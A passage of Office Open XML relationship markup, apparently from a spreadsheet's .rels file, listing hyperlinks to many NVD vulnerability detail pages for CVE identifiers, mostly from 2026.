TargetMode="External" Id="rId2313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81986" TargetMode="External" Id="rId2314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81987" TargetMode="External" Id="rId2315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81988" TargetMode="External" Id="rId2316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81989" TargetMode="External" Id="rId2317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81990" TargetMode="External" Id="rId2318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81992" TargetMode="External" Id="rId2319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId2320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId2321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId2322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId2323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId2324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId2325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId2326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId2327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83959" TargetMode="External" Id="rId2328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId2329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId2330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId2331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId2332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId2333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId2334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId2335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId2336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId2337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId2338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId2339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId2340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId2341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId2342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId2343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId2344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId2345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId2346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId2347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId2348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId2349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId2350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId2351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId2352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84042" TargetMode="External" Id="rId2353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85983" TargetMode="External" Id="rId2354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86313" TargetMode="External" Id="rId2355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86504" TargetMode="External" Id="rId2356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88052" TargetMode="External" Id="rId2357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9034" TargetMode="External" Id="rId2358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15140" TargetMode="External" Id="rId2359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15913" TargetMode="External" Id="rId2360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17176" TargetMode="External" Id="rId2361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17527" TargetMode="External" Id="rId2362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18167" TargetMode="External" Id="rId2363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18905" TargetMode="External" Id="rId2364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19118" TargetMode="External" Id="rId2365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19283" TargetMode="External" Id="rId2366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19304" TargetMode="External" Id="rId2367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19306" TargetMode="External" Id="rId2368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19397" TargetMode="External" Id="rId2369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19584" TargetMode="External" Id="rId2370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23920" TargetMode="External" Id="rId2371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28802" TargetMode="External" Id="rId2372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34948" TargetMode="External" Id="rId2373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44252" TargetMode="External" Id="rId2374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44293" TargetMode="External" Id="rId2375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44495" TargetMode="External" Id="rId2376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4598" TargetMode="External" Id="rId2377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4602" TargetMode="External" Id="rId2378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48553" TargetMode="External" Id="rId2379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48554" TargetMode="External" Id="rId2380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53549" TargetMode="External" Id="rId2381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53553" TargetMode="External" Id="rId2382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54493" TargetMode="External" Id="rId2383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55523" TargetMode="External" Id="rId2384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55658" TargetMode="External" Id="rId2385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57171" TargetMode="External" Id="rId2386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61617" TargetMode="External" Id="rId2387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61792" TargetMode="External" Id="rId2388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63464" TargetMode="External" Id="rId2389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63633" TargetMode="External" Id="rId2390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66738" TargetMode="External" Id="rId2391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId2392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68560" TargetMode="External" Id="rId2393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69192" TargetMode="External" Id="rId2394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId2395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70479" TargetMode="External" Id="rId2396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71303" TargetMode="External" Id="rId2397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71307" TargetMode="External" Id="rId2398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72762" TargetMode="External" Id="rId2399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72777" TargetMode="External" Id="rId2400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73217" TargetMode="External" Id="rId2401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73218" TargetMode="External" Id="rId2402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73267" TargetMode="External" Id="rId2403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId2404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73626" TargetMode="External" Id="rId2405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75033" TargetMode="External" Id="rId2406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75569" TargetMode="External" Id="rId2407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76640" TargetMode="External" Id="rId2408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76851" TargetMode="External" Id="rId2409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId2410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77646" TargetMode="External" Id="rId2411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77775" TargetMode="External" Id="rId2412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77909" TargetMode="External" Id="rId2413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId2414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79637" TargetMode="External" Id="rId2415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79750" TargetMode="External" Id="rId2416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80134" TargetMode="External" Id="rId2417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81210" TargetMode="External" Id="rId2418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81832" TargetMode="External" Id="rId2419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82536" TargetMode="External" Id="rId2420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId2421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84256" TargetMode="External" Id="rId2422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84361" TargetMode="External" Id="rId2423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85168" TargetMode="External" Id="rId2424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85182" TargetMode="External" Id="rId2425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85619" TargetMode="External" Id="rId2426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86083" TargetMode="External" Id="rId2427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86207" TargetMode="External" Id="rId2428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86494" TargetMode="External" Id="rId2429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86498" TargetMode="External" Id="rId2430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87084" TargetMode="External" Id="rId2431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87993" TargetMode="External" Id="rId2432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87996" TargetMode="External" Id="rId2433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89060" TargetMode="External" Id="rId2434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9040" TargetMode="External" Id="rId2435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9804" TargetMode="External" Id="rId2436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-46418" TargetMode="External" Id="rId2437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16313" TargetMode="External" Id="rId2438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18621" TargetMode="External" Id="rId2439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19387" TargetMode="External" Id="rId2440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19869" TargetMode="External" Id="rId2441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38822" TargetMode="External" Id="rId2442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39924" TargetMode="External" Id="rId2443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42804" TargetMode="External" Id="rId2444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47666" TargetMode="External" Id="rId2445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48766" TargetMode="External" Id="rId2446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48767" TargetMode="External" Id="rId2447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49222" TargetMode="External" Id="rId2448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49223" TargetMode="External" Id="rId2449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49227" TargetMode="External" Id="rId2450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53635" TargetMode="External" Id="rId2451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53958" TargetMode="External" Id="rId2452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54245" TargetMode="External" Id="rId2453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55532" TargetMode="External" Id="rId2454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55643" TargetMode="External" Id="rId2455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5846" TargetMode="External" Id="rId2456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65822" TargetMode="External" Id="rId2457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65935" TargetMode="External" Id="rId2458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68900" TargetMode="External" Id="rId2459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69257" TargetMode="External" Id="rId2460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70454" TargetMode="External" Id="rId2461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70474" TargetMode="External" Id="rId2462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71048" TargetMode="External" Id="rId2463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71327" TargetMode="External" Id="rId2464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72835" TargetMode="External" Id="rId2465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73083" TargetMode="External" Id="rId2466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73264" TargetMode="External" Id="rId2467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73313" TargetMode="External" Id="rId2468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73408" TargetMode="External" Id="rId2469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73611" TargetMode="External" Id="rId2470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77110" TargetMode="External" Id="rId2471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77368" TargetMode="External" Id="rId2472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79639" TargetMode="External" Id="rId2473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79749" TargetMode="External" Id="rId2474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80182" TargetMode="External" Id="rId2475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82020" TargetMode="External" Id="rId2476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId2477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 